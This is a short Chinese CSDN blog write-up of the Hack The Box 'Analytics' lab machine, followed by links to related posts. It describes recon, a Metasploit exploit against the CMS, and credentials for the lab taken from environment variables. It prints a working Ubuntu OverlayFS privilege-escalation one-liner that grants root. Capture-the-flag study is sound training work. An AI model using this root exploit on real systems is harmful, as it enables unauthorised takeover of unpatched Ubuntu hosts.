HTB-Analytics

最新推荐文章于 2024-11-09 23:34:47 发布

Plkaciu

最新推荐文章于 2024-11-09 23:34:47 发布

阅读量574

点赞数 13

分类专栏： # HTB 文章标签：安全 web安全

本文链接：https://blog.csdn.net/qq_58528311/article/details/135020072

版权

HTB 专栏收录该内容

5 篇文章 0 订阅

订阅专栏

一、信息收集

绑定hosts文件

使用gobuster工具爆破子域名，爆出了一个地址

是一个登录页面

二、漏洞利用

发现这个cms存在漏洞

msfconsole里面有脚本

拿到shell

查看环境变量里面发现账号：metalytics 密码：An4lytics_ds20223#

连接成功

三、权限提升

查看系统版本号

找到提权漏洞https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/?rdt=39411

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("输入命令")'

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Plkaciu

关注关注

13
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

HTB Analytics WriteUp

qq_58869808的博客

10-08

3230

看见.dockerenv 存在.dockerenv 目录下，，感觉应该是在一个docker容器里面。简单收集了一波信息，没有可以利用suid，没有sudo -l ，尝试内核提权吧。发现新的子域名,所以马上尝试vhost碰撞,这也是是一个思路。虽然回显显示sql执行失败报错，但是实际命令是成功执行的。一眼看上去就感觉是一个组件类似的东西，google。经典两端口 22 80 ,80 重定向到。然后把这个子域名加入hosts文件。读取env的内容，存在用户和密码。这个也是ok的，就一个sh脚本。

htb-beep

m0_55772907的博客

09-15

995

一般

参与评论您还未登录，请先登录后发表或查看评论

HTB-Mango

TA不懒，但还没有添加简介

04-10

879

HTB-Mango

HTB：Analytics[WriteUP]

如有错误感谢斧正

10-29

1027

PS：由于这道题不管怎么填都填不对，往上也找不到任何做对这道题的人所以略过此题。使用浏览器访问子域：data.analytical.htb。利用从searchsploit拿到的EXP进行漏洞利用。可见主域就是纯纯的静态网页，没有继续测试的必要。对靶机22、80端口进行脚本、服务信息扫描。使用curl访问子域获得响应，查找版本信息。由扫描结果可见，靶机开放22、80端口共。在上文EXP中找到相关API漏洞利用路径。将靶机IP与域名绑定使DNS从本地解析。靶机IP：10.10.11.233。

HackTheBox系列-Analytics

qq_43264813的博客

12-18

906

1、使用nmap进行端口扫描2、发现目标开放了两个端口，对22和80端口进行信息收集3、扫描发现80端口绑定着一个域名analytical.htb，将其添加到hosts文件中并使用浏览器访问4、对网页进行信息收集发现一个子域名data.analytical.htb5、目录枚举半天也没有发现什么，子域名爆破也没有爆破出来其它子域名6、将发现的子域名添加到hosts文件并使用浏览器访问刚才在源码中发现的子域名，发现是一个标题为Metabase的站。

Hack The Box-Analytics

03-18

567

利用matebase的RCE漏洞进行反弹shell，再根据系统内核版本进行提权！总的来说没难度！

HackTheBox-Machines--Analytics

七天

12-18

194

Analytics 测试过程。

【Hack The Box】linux练习-- Mango

人间体佐菲的博客

11-22

468

【Hack The Box】linux练习-- Mango

qos-htb-开源

05-03

qos-htb是您一直在等待的简单带宽管理解决方案，graphix制作了图表，您可以在一秒钟之内查看到底谁在消耗带宽！

xml-HTB-开源

05-02

xml-HTB是用于自动生成bash脚本的工具，该工具可在Linux上设置HTB。它使用xml配置文件。它易于使用，具有许多功能：多种深度的类，可配置的叶子，u32和fw过滤器，可同时配置两个输入

HTB-Recon:Hackthebox计算机的自动侦查脚本（hackthebox.eu）

03-09

例如： ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话它能做什么在您的主目录中创建一个工作区。创建不同的文件夹以使事情...

HTB-Gen:脚本para gerar邀请de HackTheBox

03-29

HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos，para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...

【网络】深入理解 HTTPS：确保数据传输安全的核心协议

人生苦短，睡觉要紧，睡醒再说

11-06

1650

HTTPS（HyperText Transfer Protocol Secure）是 HTTP 协议的安全版本。HTTP 是用于客户端与服务器之间传输网页数据的协议，而 HTTPS 在 HTTP 协议的基础上添加了一层SSL/TLS加密协议，使得传输的数据在网络中不易被窃取或篡改。HTTPS 通常用于传输敏感信息，如登录凭证、支付信息、个人数据等。与 HTTP 协议不同，HTTPS 在数据传输过程中会对信息进行加密，确保数据在传输过程中不被第三方监听或修改。

PHP常用的安全函数作用

sheji888的专栏

11-06

618

这些函数和方法有助于提升PHP应用的安全性，但安全是一个综合性的问题，需要综合使用多种手段，如输入验证、输出编码、会话管理、错误处理等。在PHP开发中，安全是非常重要的一个方面。

信息安全工程师（82）操作系统安全概述

m0_73399576的博客

11-08

1189

信息安全工程师——操作系统安全概述篇

【AliCloud】ack + ack-secret-manager + kms 敏感数据安全存储

最新发布

StrayCat的博客

11-09

807

ack-secret-manager支持以Kubernetes Secret实例的形式向集群导入或同步KMS凭据信息，确保您集群内的应用能够安全地访问敏感信息。通过该组件，您可以实现密钥数据的自动更新，使应用负载通过文件系统挂载指定Secret实例来使用凭据信息，同时帮助您解决负载应用和阿里云凭据管家交互的兼容性问题。

案例精选 | 河北省某检察院安全运营中异构日志数据融合的实践探索

juminfo的博客

11-08

797

河北省某检察院是当地重要的法律监督机构，肩负着维护法律尊严和社会公平正义的重要职责。该机构依法独立行使检察权，负责对犯罪行为提起公诉，并监督整个诉讼过程，同时积极参与社会治理，保护公民权益，推动法治社会的建设与发展。近年来，随着信息化技术的快速发展，河北省某检察院积极响应国家号召，倡导并实践“智慧检察”的先进理念，致力于推进检察工作的现代化转型。特别是在数字化检委会会议系统的建设上取得了显著成效，成功实现了会议的“无纸化”操作。

数字身份发展趋势前瞻：身份韧性与安全

trusfort的博客

11-05

595

面对日益复杂的网络威胁和不断增长的身份盗窃风险，身份韧性与安全不仅仅涉及产品的防御能力，还包括应对突发事件、快速恢复的弹性和灵活性。